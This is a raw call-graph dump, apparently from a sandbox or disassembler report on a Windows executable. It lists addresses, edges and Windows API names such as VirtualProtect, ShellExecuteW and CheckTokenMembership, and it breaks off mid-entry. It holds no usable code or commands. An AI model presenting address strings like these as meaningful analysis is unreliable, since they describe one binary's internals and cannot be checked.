100888 53cdc7 100883->100888 100984 53d8c8 92 API calls Mailbox 100884->100984 100887 53cf3d 100887->100888 100889 53cf49 100887->100889 100948 53c96e 100888->100948 100905 53cb61 Mailbox 100889->100905 100890 4c9837 84 API calls 100907 53cbb2 Mailbox 100890->100907 100895 53ce00 100963 4e0c08 100895->100963 100898 53ce33 100970 4c92ce 100898->100970 100899 53ce1a 100969 529e4a 89 API calls 4 library calls 100899->100969 100902 53ce25 GetCurrentProcess TerminateProcess 100902->100898 100905->100817 100907->100883 100907->100890 100907->100905 100967 53fbce 59 API calls 2 library calls 100907->100967 100968 53cfdf 61 API calls 2 library calls 100907->100968 100908 53ce7c 100910 53cfa4 100908->100910 100916 4c9d3c 60 API calls 100908->100916 100983 4c8d40 59 API calls Mailbox 100908->100983 100985 53d649 107 API calls _free 100908->100985 100910->100905 100912 53cfb8 FreeLibrary 100910->100912 100911 53ce6b 100982 53d649 107 API calls _free 100911->100982 100912->100905 100916->100908 100918 4c984b 100917->100918 100919 4c9851 100917->100919 100918->100905 100935 53d7a5 100918->100935 100920 4ff5d3 __i64tow 100919->100920 100921 4c9899 100919->100921 100923 4c9857 __itow 100919->100923 100927 4ff4da 100919->100927 100986 4e3698 83 API calls 4 library calls 100921->100986 100925 4e0db6 Mailbox 59 API calls 100923->100925 100926 4c9871 100925->100926 100926->100918 100929 4c7de1 59 API calls 100926->100929 100928 4e0db6 Mailbox 59 API calls 100927->100928 100930 4ff552 Mailbox _wcscpy 100927->100930 100931 4ff51f 100928->100931 100929->100918 100987 4e3698 83 API calls 4 library calls 100930->100987 100932 4e0db6 Mailbox 59 API calls 100931->100932 100933 4ff545 100932->100933 100933->100930 100934 4c7de1 59 API calls 100933->100934 100934->100930 100936 4c7e4f 59 API calls 100935->100936 100937 53d7c0 CharLowerBuffW 100936->100937 100988 51f167 100937->100988 100941 4c7667 59 API calls 100942 53d7f9 100941->100942 100995 4c784b 100942->100995 100944 53d810 100946 4c7d2c 59 API calls 100944->100946 100945 53d858 Mailbox 100945->100907 100947 53d81c Mailbox 100946->100947 100947->100945 101008 53cfdf 61 API calls 2 library calls 100947->101008 100949 53c9de 100948->100949 100950 53c989 100948->100950 100954 53da50 100949->100954 100951 4e0db6 Mailbox 59 API calls 100950->100951 100953 53c9ab 100951->100953 100952 4e0db6 Mailbox 59 API calls 100952->100953 100953->100949 100953->100952 100955 53dc79 Mailbox 100954->100955 100962 53da73 _strcat _wcscpy __NMSG_WRITE 100954->100962 100955->100895 100956 4c9be6 59 API calls 100956->100962 100957 4c9b3c 59 API calls 100957->100962 100958 4c9b98 59 API calls 100958->100962 100959 4c9837 84 API calls 100959->100962 100960 4e571c 58 API calls __crtCompareStringA_stat 100960->100962 100962->100955 100962->100956 100962->100957 100962->100958 100962->100959 100962->100960 101012 525887 61 API calls 2 library calls 100962->101012 100964 4e0c1d 100963->100964 100965 4e0cb5 VirtualProtect 100964->100965 100966 4e0c83 100964->100966 100965->100966 100966->100898 100966->100899 100967->100907 100968->100907 100969->100902 100971 4c92d6 100970->100971 100972 4e0db6 Mailbox 59 API calls 100971->100972 100973 4c92e4 100972->100973 100974 4c92f0 100973->100974 101013 4c91fc 59 API calls Mailbox 100973->101013 100976 4c9050 100974->100976 101014 4c9160 100976->101014 100978 4c905f 100979 4e0db6 Mailbox 59 API calls 100978->100979 100980 4c90fb 100978->100980 100979->100980 100980->100908 100981 4c8d40 59 API calls Mailbox 100980->100981 100981->100911 100982->100908 100983->100908 100984->100887 100985->100908 100986->100923 100987->100920 100989 51f192 __NMSG_WRITE 100988->100989 100992 51f1c7 100989->100992 100993 51f278 100989->100993 100994 51f1d1 100989->100994 100992->100994 101009 4c78c4 61 API calls 100992->101009 100993->100994 101010 4c78c4 61 API calls 100993->101010 100994->100941 100994->100947 100996 4c785a 100995->100996 100997 4c78b7 100995->100997 100996->100997 100999 4c7865 100996->100999 100998 4c7d2c 59 API calls 100997->100998 101004 4c7888 _memmove 100998->101004 101000 4feb09 100999->101000 101001 4c7880 100999->101001 101002 4c8029 59 API calls 101000->101002 101011 4c7f27 59 API calls Mailbox 101001->101011 101005 4feb13 101002->101005 101004->100944 101006 4e0db6 Mailbox 59 API calls 101005->101006 101007 4feb33 101006->101007 101008->100945 101009->100992 101010->100993 101011->101004 101012->100962 101013->100974 101015 4c9169 Mailbox 101014->101015 101016 4ff19f 101015->101016 101021 4c9173 101015->101021 101017 4e0db6 Mailbox 59 API calls 101016->101017 101019 4ff1ab 101017->101019 101018 4c917a 101018->100978 101020 4c9c90 Mailbox 59 API calls 101020->101021 101021->101018 101021->101020 101022->100838 101023->100838 101024->100834 101025->100839 101026->100843 101027->100839 101028->100848 101029->100860 101030->100860 101031->100870 101032 4e7c56 101033 4e7c62 __ioinit 101032->101033 101069 4e9e08 GetStartupInfoW 101033->101069 101035 4e7c67 101071 4e8b7c GetProcessHeap 101035->101071 101037 4e7cbf 101038 4e7cca 101037->101038 101154 4e7da6 58 API calls 3 library calls 101037->101154 101072 4e9ae6 101038->101072 101041 4e7cd0 101042 4e7cdb __RTC_Initialize 101041->101042 101155 4e7da6 58 API calls 3 library calls 101041->101155 101093 4ed5d2 101042->101093 101045 4e7cea 101046 4e7cf6 GetCommandLineW 101045->101046 101156 4e7da6 58 API calls 3 library calls 101045->101156 101112 4f4f23 GetEnvironmentStringsW 101046->101112 101049 4e7cf5 101049->101046 101052 4e7d10 101053 4e7d1b 101052->101053 101157 4e30b5 58 API calls 3 library calls 101052->101157 101122 4f4d58 101053->101122 101056 4e7d21 101057 4e7d2c 101056->101057 101158 4e30b5 58 API calls 3 library calls 101056->101158 101136 4e30ef 101057->101136 101060 4e7d34 101061 4e7d3f __wwincmdln 101060->101061 101159 4e30b5 58 API calls 3 library calls 101060->101159 101142 4c47d0 101061->101142 101064 4e7d53 101065 4e7d62 101064->101065 101160 4e3358 58 API calls _doexit 101064->101160 101161 4e30e0 58 API calls _doexit 101065->101161 101068 4e7d67 __ioinit 101070 4e9e1e 101069->101070 101070->101035 101071->101037 101162 4e3187 36 API calls 2 library calls 101072->101162 101074 4e9aeb 101163 4e9d3c InitializeCriticalSectionAndSpinCount __ioinit 101074->101163 101076 4e9af0 101077 4e9af4 101076->101077 101165 4e9d8a TlsAlloc 101076->101165 101164 4e9b5c 61 API calls 2 library calls 101077->101164 101080 4e9af9 101080->101041 101081 4e9b06 101081->101077 101082 4e9b11 101081->101082 101166 4e87d5 101082->101166 101085 4e9b53 101174 4e9b5c 61 API calls 2 library calls 101085->101174 101088 4e9b58 101088->101041 101089 4e9b32 101089->101085 101090 4e9b38 101089->101090 101173 4e9a33 58 API calls 4 library calls 101090->101173 101092 4e9b40 GetCurrentThreadId 101092->101041 101094 4ed5de __ioinit 101093->101094 101095 4e9c0b __lock 58 API calls 101094->101095 101096 4ed5e5 101095->101096 101097 4e87d5 __calloc_crt 58 API calls 101096->101097 101098 4ed5f6 101097->101098 101099 4ed661 GetStartupInfoW 101098->101099 101100 4ed601 __ioinit @_EH4_CallFilterFunc@8 101098->101100 101106 4ed676 101099->101106 101109 4ed7a5 101099->101109 101100->101045 101101 4ed86d 101188 4ed87d LeaveCriticalSection _doexit 101101->101188 101103 4e87d5 __calloc_crt 58 API calls 101103->101106 101104 4ed7f2 GetStdHandle 101104->101109 101105 4ed805 GetFileType 101105->101109 101106->101103 101108 4ed6c4 101106->101108 101106->101109 101107 4ed6f8 GetFileType 101107->101108 101108->101107 101108->101109 101186 4e9e2b InitializeCriticalSectionAndSpinCount 101108->101186 101109->101101 101109->101104 101109->101105 101187 4e9e2b InitializeCriticalSectionAndSpinCount 101109->101187 101113 4e7d06 101112->101113 101114 4f4f34 101112->101114 101118 4f4b1b GetModuleFileNameW 101113->101118 101189 4e881d 58 API calls 2 library calls 101114->101189 101116 4f4f5a _memmove 101117 4f4f70 FreeEnvironmentStringsW 101116->101117 101117->101113 101119 4f4b4f _wparse_cmdline 101118->101119 101121 4f4b8f _wparse_cmdline 101119->101121 101190 4e881d 58 API calls 2 library calls 101119->101190 101121->101052 101123 4f4d71 __NMSG_WRITE 101122->101123 101127 4f4d69 101122->101127 101124 4e87d5 __calloc_crt 58 API calls 101123->101124 101132 4f4d9a __NMSG_WRITE 101124->101132 101125 4f4df1 101126 4e2d55 _free 58 API calls 101125->101126 101126->101127 101127->101056 101128 4e87d5 __calloc_crt 58 API calls 101128->101132 101129 4f4e16 101130 4e2d55 _free 58 API calls 101129->101130 101130->101127 101132->101125 101132->101127 101132->101128 101132->101129 101133 4f4e2d 101132->101133 101191 4f4607 58 API calls 2 library calls 101132->101191 101192 4e8dc6 IsProcessorFeaturePresent 101133->101192 101135 4f4e39 101135->101056 101138 4e30fb __IsNonwritableInCurrentImage 101136->101138 101215 4ea4d1 101138->101215 101139 4e3119 __initterm_e 101140 4e2d40 __cinit 67 API calls 101139->101140 101141 4e3138 __cinit __IsNonwritableInCurrentImage 101139->101141 101140->101141 101141->101060 101143 4c47ea 101142->101143 101153 4c4889 101142->101153 101144 4c4824 IsThemeActive 101143->101144 101218 4e336c 101144->101218 101148 4c4850 101230 4c48fd SystemParametersInfoW SystemParametersInfoW 101148->101230 101150 4c485c 101231 4c3b3a 101150->101231 101152 4c4864 SystemParametersInfoW 101152->101153 101153->101064 101154->101038 101155->101042 101156->101049 101160->101065 101161->101068 101162->101074 101163->101076 101164->101080 101165->101081 101167 4e87dc 101166->101167 101169 4e8817 101167->101169 101171 4e87fa 101167->101171 101175 4f51f6 101167->101175 101169->101085 101172 4e9de6 TlsSetValue 101169->101172 101171->101167 101171->101169 101183 4ea132 Sleep 101171->101183 101172->101089 101173->101092 101174->101088 101176 4f5201 101175->101176 101181 4f521c 101175->101181 101177 4f520d 101176->101177 101176->101181 101184 4e8b28 58 API calls __getptd_noexit 101177->101184 101179 4f522c RtlAllocateHeap 101180 4f5212 101179->101180 101179->101181 101180->101167 101181->101179 101181->101180 101185 4e33a1 DecodePointer 101181->101185 101183->101171 101184->101180 101185->101181 101186->101108 101187->101109 101188->101100 101189->101116 101190->101121 101191->101132 101193 4e8dd1 101192->101193 101198 4e8c59 101193->101198 101197 4e8dec 101197->101135 101199 4e8c73 _memset ___raise_securityfailure 101198->101199 101200 4e8c93 IsDebuggerPresent 101199->101200 101206 4ea155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101200->101206 101203 4e8d7a 101205 4ea140 GetCurrentProcess TerminateProcess 101203->101205 101204 4e8d57 ___raise_securityfailure 101207 4ec5f6 101204->101207 101205->101197 101206->101204 101208 4ec5fe 101207->101208 101209 4ec600 IsProcessorFeaturePresent 101207->101209 101208->101203 101211 4f590a 101209->101211 101214 4f58b9 5 API calls ___raise_securityfailure 101211->101214 101213 4f59ed 101213->101203 101214->101213 101216 4ea4d4 EncodePointer 101215->101216 101216->101216 101217 4ea4ee 101216->101217 101217->101139 101219 4e9c0b __lock 58 API calls 101218->101219 101220 4e3377 DecodePointer EncodePointer 101219->101220 101283 4e9d75 LeaveCriticalSection 101220->101283 101222 4c4849 101223 4e33d4 101222->101223 101224 4e33f8 101223->101224 101225 4e33de 101223->101225 101224->101148 101225->101224 101284 4e8b28 58 API calls __getptd_noexit 101225->101284 101227 4e33e8 101285 4e8db6 9 API calls __commit 101227->101285 101229 4e33f3 101229->101148 101230->101150 101232 4c3b47 __ftell_nolock 101231->101232 101233 4c7667 59 API calls 101232->101233 101234 4c3b51 GetCurrentDirectoryW 101233->101234 101286 4c3766 101234->101286 101236 4c3b7a IsDebuggerPresent 101237 4c3b88 101236->101237 101238 4fd272 MessageBoxA 101236->101238 101239 4c3c61 101237->101239 101241 4fd28c 101237->101241 101242 4c3ba5 101237->101242 101238->101241 101240 4c3c68 SetCurrentDirectoryW 101239->101240 101243 4c3c75 Mailbox 101240->101243 101496 4c7213 59 API calls Mailbox 101241->101496 101367 4c7285 101242->101367 101243->101152 101246 4fd29c 101251 4fd2b2 SetCurrentDirectoryW 101246->101251 101248 4c3bc3 GetFullPathNameW 101249 4c7bcc 59 API calls 101248->101249 101250 4c3bfe 101249->101250 101383 4d092d 101250->101383 101251->101243 101254 4c3c1c 101255 4c3c26 101254->101255 101497 51874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101254->101497 101399 4c3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101255->101399 101258 4fd2cf 101258->101255 101261 4fd2e0 101258->101261 101263 4c4706 61 API calls 101261->101263 101262 4c3c30 101264 4c3c43 101262->101264 101407 4c434a 101262->101407 101265 4fd2e8 101263->101265 101418 4d09d0 101264->101418 101268 4c7de1 59 API calls 101265->101268 101270 4fd2f5 101268->101270 101269 4c3c4e 101269->101239 101495 4c443a Shell_NotifyIconW _memset 101269->101495 101272 4fd2ff 101270->101272 101273 4fd324 101270->101273 101275 4c7cab 59 API calls 101272->101275 101274 4c7cab 59 API calls 101273->101274 101276 4fd320 GetForegroundWindow ShellExecuteW 101274->101276 101277 4fd30a 101275->101277 101280 4fd354 Mailbox 101276->101280 101498 4c7b2e 101277->101498 101280->101239 101282 4c7cab 59 API calls 101282->101276 101283->101222 101284->101227 101285->101229 101287 4c7667 59 API calls 101286->101287 101288 4c377c 101287->101288 101507 4c3d31 101288->101507 101290 4c379a 101291 4c4706 61 API calls 101290->101291 101292 4c37ae 101291->101292 101293 4c7de1 59 API calls 101292->101293 101294 4c37bb 101293->101294 101521 4c4ddd 101294->101521 101297 4c37dc Mailbox 101302 4c8047 59 API calls 101297->101302 101298 4fd173 101577 52955b 101298->101577 101301 4fd192 101304 4e2d55 _free 58 API calls 101301->101304 101305 4c37ef 101302->101305 101306 4fd19f 101304->101306 101545 4c928a 101305->101545 101308 4c4e4a 84 API calls 101306->101308 101310 4fd1a8 101308->101310 101314 4c3ed0 59 API calls 101310->101314 101311 4c7de1 59 API calls 101312 4c3808 101311->101312 101548 4c84c0 101312->101548 101316 4fd1c3 101314->101316 101315 4c381a Mailbox 101317 4c7de1 59 API calls 101315->101317 101318 4c3ed0 59 API calls 101316->101318 101319 4c3840 101317->101319 101320 4fd1df 101318->101320 101321 4c84c0 69 API calls 101319->101321 101323 4c4706 61 API calls 101320->101323 101322 4c384f Mailbox 101321->101322 101327 4c7667 59 API calls 101322->101327 101324 4fd204 101323->101324 101325 4c3ed0 59 API calls 101324->101325 101326 4fd210 101325->101326 101328 4c8047 59 API calls 101326->101328 101329 4c386d 101327->101329 101330 4fd21e 101328->101330 101552 4c3ed0 101329->101552 101332 4c3ed0 59 API calls 101330->101332 101334 4fd22d 101332->101334 101340 4c8047 59 API calls 101334->101340 101336 4c3887 101336->101310 101337 4c3891 101336->101337 101338 4e2efd _W_store_winword 60 API calls 101337->101338 101339 4c389c 101338->101339 101339->101316 101341 4c38a6 101339->101341 101342 4fd24f 101340->101342 101343 4e2efd _W_store_winword 60 API calls 101341->101343 101344 4c3ed0 59 API calls 101342->101344 101345 4c38b1 101343->101345 101346 4fd25c 101344->101346 101345->101320 101347 4c38bb 101345->101347 101346->101346 101348 4e2efd _W_store_winword 60 API calls 101347->101348 101349 4c38c6 101348->101349 101349->101334 101350 4c3907 101349->101350 101352 4c3ed0 59 API calls 101349->101352 101350->101334 101351 4c3914 101350->101351 101353 4c92ce 59 API calls 101351->101353 101354 4c38ea 101352->101354 101355 4c3924 101353->101355 101356 4c8047 59 API calls 101354->101356 101357 4c9050 59 API calls 101355->101357 101358 4c38f8 101356->101358 101359 4c3932 101357->101359 101360 4c3ed0 59 API calls 101358->101360 101568 4c8ee0 101359->101568 101360->101350 101362 4c928a 59 API calls 101364 4c394f 101362->101364 101363 4c8ee0 60 API calls 101363->101364 101364->101362 101364->101363 101365 4c3ed0 59 API calls 101364->101365 101366 4c3995 Mailbox 101364->101366 101365->101364 101366->101236 101368 4c7292 __ftell_nolock 101367->101368 101369 4c72ab 101368->101369 101370 4fea22 _memset 101368->101370 101371 4c4750 60 API calls 101369->101371 101373 4fea3e GetOpenFileNameW 101370->101373 101372 4c72b4 101371->101372 102185 4e0791 101372->102185 101375 4fea8d 101373->101375 101377 4c7bcc 59 API calls 101375->101377 101378 4feaa2 101377->101378 101378->101378 101380 4c72c9 102203 4c686a 101380->102203 101384 4d093a __ftell_nolock 101383->101384 102441 4c6d80 101384->102441 101386 4d093f 101387 4c3c14 101386->101387 102452 4d119e 89 API calls 101386->102452 101387->101246 101387->101254 101389 4d094c 101389->101387 102453 4d3ee7 91 API calls Mailbox 101389->102453 101391 4d0955 101391->101387 101392 4d0959 GetFullPathNameW 101391->101392 101393 4c7bcc 59 API calls 101392->101393 101394 4d0985 101393->101394 101395 4c7bcc 59 API calls 101394->101395 101396 4d0992 101395->101396 101397 504cab _wcscat 101396->101397 101398 4c7bcc 59 API calls 101396->101398 101398->101387 101400 4c3ab0 LoadImageW RegisterClassExW 101399->101400 101401 4fd261 101399->101401 102491 4c3041 7 API calls 101400->102491 102492 4c47a0 LoadImageW EnumResourceNamesW 101401->102492 101404 4c3b34 101406 4c39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101404->101406 101405 4fd26a 101406->101262 101408 4c4375 _memset 101407->101408 102493 4c4182 101408->102493 101411 4c43fa 101413 4c4414 Shell_NotifyIconW 101411->101413 101414 4c4430 Shell_NotifyIconW 101411->101414 101415 4c4422 101413->101415 101414->101415 102497 4c407c 101415->102497 101417 4c4429 101417->101264 101419 504cc3 101418->101419 101432 4d09f5 101418->101432 102660 529e4a 89 API calls 4 library calls 101419->102660 101421 4d0cfa 101421->101269 101424 4d0ee4 101424->101421 101426 4d0ef1 101424->101426 101425 4d0a4b PeekMessageW 101494 4d0a05 Mailbox 101425->101494 102658 4d1093 341 API calls Mailbox 101426->102658 101429 4d0ef8 LockWindowUpdate DestroyWindow GetMessageW 101429->101421 101430 4d0f2a 101429->101430 101434 505c58 TranslateMessage DispatchMessageW GetMessageW 101430->101434 101431 4d0ce4 101431->101421 102657 4d1070 10 API calls Mailbox 101431->102657 101432->101494 102661 4c9e5d 60 API calls 101432->102661 102662 516349 341 API calls 101432->102662 101433 504e81 Sleep 101433->101494 101434->101434 101436 505c88 101434->101436 101436->101421 101437 504d50 TranslateAcceleratorW 101440 4d0e43 PeekMessageW 101437->101440 101437->101494 101438 4c9e5d 60 API calls 101438->101494 101439 4d0ea5 TranslateMessage DispatchMessageW 101439->101440 101440->101494 101441 50581f WaitForSingleObject 101444 50583c GetExitCodeProcess CloseHandle 101441->101444 101441->101494 101443 4d0d13 timeGetTime 101443->101494 101478 4d0f95 101444->101478 101445 4d0e5f Sleep 101479 4d0e70 Mailbox 101445->101479 101446 4c8047 59 API calls 101446->101494 101447 4c7667 59 API calls 101447->101479 101448 505af8 Sleep 101448->101479 101450 4e0db6 59 API calls Mailbox 101450->101494 101452 4d0f4e timeGetTime 102659 4c9e5d 60 API calls 101452->102659 101453 4e049f timeGetTime 101453->101479 101456 505b8f GetExitCodeProcess 101459 505ba5 WaitForSingleObject 101456->101459 101460 505bbb CloseHandle 101456->101460 101457 4c9837 84 API calls 101457->101494 101458 4cb7dd 109 API calls 101458->101479 101459->101460 101459->101494 101460->101479 101463 545f25 110 API calls 101463->101479 101464 505874 101464->101478 101465 505078 Sleep 101465->101494 101466 505c17 Sleep 101466->101494 101468 4c7de1 59 API calls 101468->101479 101477 4c7de1 59 API calls 101477->101494 101478->101269 101479->101447 101479->101453 101479->101456 101479->101458 101479->101463 101479->101464 101479->101465 101479->101466 101479->101468 101479->101478 101479->101494 102679 522408 60 API calls 101479->102679 102680 4c9e5d 60 API calls 101479->102680 102681 4c89b3 69 API calls Mailbox 101479->102681 102682 4cb73c 341 API calls 101479->102682 102683 5164da 60 API calls 101479->102683 102684 525244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101479->102684 102685 523c55 66 API calls Mailbox 101479->102685 101480 529e4a 89 API calls 101480->101494 101482 4c84c0 69 API calls 101482->101494 101483 4c9c90 59 API calls Mailbox 101483->101494 101484 4c9ea0 314 API calls 101484->101494 101485 4cb73c 314 API calls 101485->101494 101487 51617e 59 API calls Mailbox 101487->101494 101488 4c89b3 69 API calls 101488->101494 101489 5055d5 VariantClear 101489->101494 101490 50566b VariantClear 101490->101494 101491 4c8cd4 59 API calls Mailbox 101491->101494 101492 505419 VariantClear 101492->101494 101493 516e8f 59 API calls 101493->101494 101494->101425 101494->101431 101494->101433 101494->101437 101494->101438 101494->101439 101494->101440 101494->101441 101494->101443 101494->101445 101494->101446 101494->101448 101494->101450 101494->101452 101494->101457 101494->101477 101494->101478 101494->101479 101494->101480 101494->101482 101494->101483 101494->101484 101494->101485 101494->101487 101494->101488 101494->101489 101494->101490 101494->101491 101494->101492 101494->101493 102520 4ce6a0 101494->102520 102551 4cf460 101494->102551 102571 4c31ce 101494->102571 102576 4ce420 341 API calls 101494->102576 102577 4cfce0 101494->102577 102663 546018 59 API calls 101494->102663 102664 529a15 59 API calls Mailbox 101494->102664 102665 51d4f2 59 API calls 101494->102665 102666 5160ef 59 API calls 2 library calls 101494->102666 102667 4c8401 59 API calls 101494->102667 102668 4c82df 101494->102668 101495->101239 101496->101246 101497->101258 101499 4fec6b 101498->101499 101500 4c7b40 101498->101500 102999 517bdb 59 API calls _memmove 101499->102999 102993 4c7a51 101500->102993 101503 4c7b4c 101503->101282 101504 4fec75 101505 4c8047 59 API calls 101504->101505 101506 4fec7d Mailbox 101505->101506 101508 4c3d3e __ftell_nolock 101507->101508 101509 4c7bcc 59 API calls 101508->101509 101514 4c3ea4 Mailbox 101508->101514 101511 4c3d70 101509->101511 101519 4c3da6 Mailbox 101511->101519 101618 4c79f2 101511->101618 101512 4c79f2 59 API calls 101512->101519 101513 4c3e77 101513->101514 101515 4c7de1 59 API calls 101513->101515 101514->101290 101517 4c3e98 101515->101517 101516 4c7de1 59 API calls 101516->101519 101518 4c3f74 59 API calls 101517->101518 101518->101514 101519->101512 101519->101513 101519->101514 101519->101516 101520 4c3f74 59 API calls 101519->101520 101520->101519 101621 4c4bb5 101521->101621 101526 4c4e08 LoadLibraryExW 101631 4c4b6a 101526->101631 101527 4fd8e6 101528 4c4e4a 84 API calls 101527->101528 101530 4fd8ed 101528->101530 101532 4c4b6a 3 API calls 101530->101532 101535 4fd8f5 101532->101535 101534 4c4e2f 101534->101535 101536 4c4e3b 101534->101536 101657 4c4f0b 101535->101657 101537 4c4e4a 84 API calls 101536->101537 101539 4c37d4 101537->101539 101539->101297 101539->101298 101542 4fd91c 101665 4c4ec7 101542->101665 101544 4fd929 101546 4e0db6 Mailbox 59 API calls 101545->101546 101547 4c37fb 101546->101547 101547->101311 101549 4c84cb 101548->101549 101551 4c84f2 101549->101551 101916 4c89b3 69 API calls Mailbox 101549->101916 101551->101315 101553 4c3eda 101552->101553 101554 4c3ef3 101552->101554 101555 4c8047 59 API calls 101553->101555 101556 4c7bcc 59 API calls 101554->101556 101557 4c3879 101555->101557 101556->101557 101558 4e2efd 101557->101558 101559 4e2f7e 101558->101559 101560 4e2f09 101558->101560 101919 4e2f90 60 API calls 4 library calls 101559->101919 101567 4e2f2e 101560->101567 101917 4e8b28 58 API calls __getptd_noexit 101560->101917 101563 4e2f8b 101563->101336 101564 4e2f15 101918 4e8db6 9 API calls __commit 101564->101918 101566 4e2f20 101566->101336 101567->101336 101569 4ff17c 101568->101569 101574 4c8ef7 101568->101574 101569->101574 101920 4c8bdb 59 API calls Mailbox 101569->101920 101571 4c8ff8 101575 4e0db6 Mailbox 59 API calls 101571->101575 101572 4c9040 101573 4c9d3c 60 API calls 101572->101573 101576 4c8fff 101573->101576 101574->101571 101574->101572 101574->101576 101575->101576 101576->101364 101578 4c4ee5 85 API calls 101577->101578 101579 5295ca 101578->101579 101921 529734 101579->101921 101582 4c4f0b 74 API calls 101583 5295f7 101582->101583 101584 4c4f0b 74 API calls 101583->101584 101585 529607 101584->101585 101586 4c4f0b 74 API calls 101585->101586 101587 529622 101586->101587 101588 4c4f0b 74 API calls 101587->101588 101589 52963d 101588->101589 101590 4c4ee5 85 API calls 101589->101590 101591 529654 101590->101591 101592 4e571c __crtCompareStringA_stat 58 API calls 101591->101592 101593 52965b 101592->101593 101594 4e571c __crtCompareStringA_stat 58 API calls 101593->101594 101595 529665 101594->101595 101596 4c4f0b 74 API calls 101595->101596 101597 529679 101596->101597 101598 529109 GetSystemTimeAsFileTime 101597->101598 101599 52968c 101598->101599 101600 5296a1 101599->101600 101601 5296b6 101599->101601 101602 4e2d55 _free 58 API calls 101600->101602 101603 52971b 101601->101603 101604 5296bc 101601->101604 101606 5296a7 101602->101606 101605 4e2d55 _free 58 API calls 101603->101605 101927 528b06 116 API calls __fcloseall 101604->101927 101611 4fd186 101605->101611 101609 4e2d55 _free 58 API calls 101606->101609 101608 529713 101610 4e2d55 _free 58 API calls 101608->101610 101609->101611 101610->101611 101611->101301 101612 4c4e4a 101611->101612 101613 4c4e5b 101612->101613 101614 4c4e54 101612->101614 101616 4c4e6a 101613->101616 101617 4c4e7b FreeLibrary 101613->101617 101928 4e53a6 101614->101928 101616->101301 101617->101616 101619 4c7e4f 59 API calls 101618->101619 101620 4c79fd 101619->101620 101620->101511 101670 4c4c03 101621->101670 101624 4c4c03 2 API calls 101627 4c4bdc 101624->101627 101625 4c4bec FreeLibrary 101626 4c4bf5 101625->101626 101628 4e525b 101626->101628 101627->101625 101627->101626 101674 4e5270 101628->101674 101630 4c4dfc 101630->101526 101630->101527 101834 4c4c36 101631->101834 101634 4c4b8f 101636 4c4baa 101634->101636 101637 4c4ba1 FreeLibrary 101634->101637 101635 4c4c36 2 API calls 101635->101634 101638 4c4c70 101636->101638 101637->101636 101639 4e0db6 Mailbox 59 API calls 101638->101639 101640 4c4c85 101639->101640 101641 4c522e 59 API calls 101640->101641 101642 4c4c91 _memmove 101641->101642 101644 4c4d89 101642->101644 101645 4c4dc1 101642->101645 101648 4c4ccc 101642->101648 101643 4c4ec7 69 API calls 101654 4c4cd5 101643->101654 101838 4c4e89 CreateStreamOnHGlobal 101644->101838 101849 52991b 95 API calls 101645->101849 101648->101643 101649 4c4f0b 74 API calls 101649->101654 101651 4c4d69 101651->101534 101652 4fd8a7 101653 4c4ee5 85 API calls 101652->101653 101655 4fd8bb 101653->101655 101654->101649 101654->101651 101654->101652 101844 4c4ee5 101654->101844 101656 4c4f0b 74 API calls 101655->101656 101656->101651 101658 4c4f1d 101657->101658 101659 4fd9cd 101657->101659 101873 4e55e2 101658->101873 101662 529109 101893 528f5f 101662->101893 101664 52911f 101664->101542 101666 4c4ed6 101665->101666 101669 4fd990 101665->101669 101898 4e5c60 101666->101898 101668 4c4ede 101668->101544 101671 4c4bd0 101670->101671 101672 4c4c0c LoadLibraryA 101670->101672 101671->101624 101671->101627 101672->101671 101673 4c4c1d GetProcAddress 101672->101673 101673->101671 101676 4e527c __ioinit 101674->101676 101675 4e528f 101723 4e8b28 58 API calls __getptd_noexit 101675->101723 101676->101675 101678 4e52c0 101676->101678 101693 4f04e8 101678->101693 101679 4e5294 101724 4e8db6 9 API calls __commit 101679->101724 101682 4e52c5 101683 4e52ce 101682->101683 101684 4e52db 101682->101684 101725 4e8b28 58 API calls __getptd_noexit 101683->101725 101686 4e5305 101684->101686 101687 4e52e5 101684->101687 101708 4f0607 101686->101708 101726 4e8b28 58 API calls __getptd_noexit 101687->101726 101690 4e529f __ioinit @_EH4_CallFilterFunc@8 101690->101630 101694 4f04f4 __ioinit 101693->101694 101695 4e9c0b __lock 58 API calls 101694->101695 101706 4f0502 101695->101706 101696 4f0576 101728 4f05fe 101696->101728 101697 4f057d 101733 4e881d 58 API calls 2 library calls 101697->101733 101700 4f05f3 __ioinit 101700->101682 101701 4f0584 101701->101696 101734 4e9e2b InitializeCriticalSectionAndSpinCount 101701->101734 101702 4e9c93 __mtinitlocknum 58 API calls 101702->101706 101705 4f05aa EnterCriticalSection 101705->101696 101706->101696 101706->101697 101706->101702 101731 4e6c50 59 API calls __lock 101706->101731 101732 4e6cba LeaveCriticalSection LeaveCriticalSection _doexit 101706->101732 101709 4f0627 __wopenfile 101708->101709 101710 4f0641 101709->101710 101722 4f07fc 101709->101722 101741 4e37cb 60 API calls 3 library calls 101709->101741 101739 4e8b28 58 API calls __getptd_noexit 101710->101739 101712 4f0646 101740 4e8db6 9 API calls __commit 101712->101740 101714 4e5310 101727 4e5332 LeaveCriticalSection LeaveCriticalSection __wfsopen 101714->101727 101715 4f085f 101736 4f85a1 101715->101736 101718 4f07f5 101718->101722 101742 4e37cb 60 API calls 3 library calls 101718->101742 101720 4f0814 101720->101722 101743 4e37cb 60 API calls 3 library calls 101720->101743 101722->101710 101722->101715 101723->101679 101724->101690 101725->101690 101726->101690 101727->101690 101735 4e9d75 LeaveCriticalSection 101728->101735 101730 4f0605 101730->101700 101731->101706 101732->101706 101733->101701 101734->101705 101735->101730 101744 4f7d85 101736->101744 101738 4f85ba 101738->101714 101739->101712 101740->101714 101741->101718 101742->101720 101743->101722 101747 4f7d91 __ioinit 101744->101747 101745 4f7da7 101831 4e8b28 58 API calls __getptd_noexit 101745->101831 101747->101745 101748 4f7ddd 101747->101748 101755 4f7e4e 101748->101755 101749 4f7dac 101832 4e8db6 9 API calls __commit 101749->101832 101752 4f7df9 101833 4f7e22 LeaveCriticalSection __unlock_fhandle 101752->101833 101754 4f7db6 __ioinit 101754->101738 101756 4f7e6e 101755->101756 101757 4e44ea __wsopen_nolock 58 API calls 101756->101757 101761 4f7e8a 101757->101761 101758 4f7fc1 101759 4e8dc6 __invoke_watson 8 API calls 101758->101759 101760 4f85a0 101759->101760 101763 4f7d85 __wsopen_helper 103 API calls 101760->101763 101761->101758 101762 4f7ec4 101761->101762 101769 4f7ee7 101761->101769 101764 4e8af4 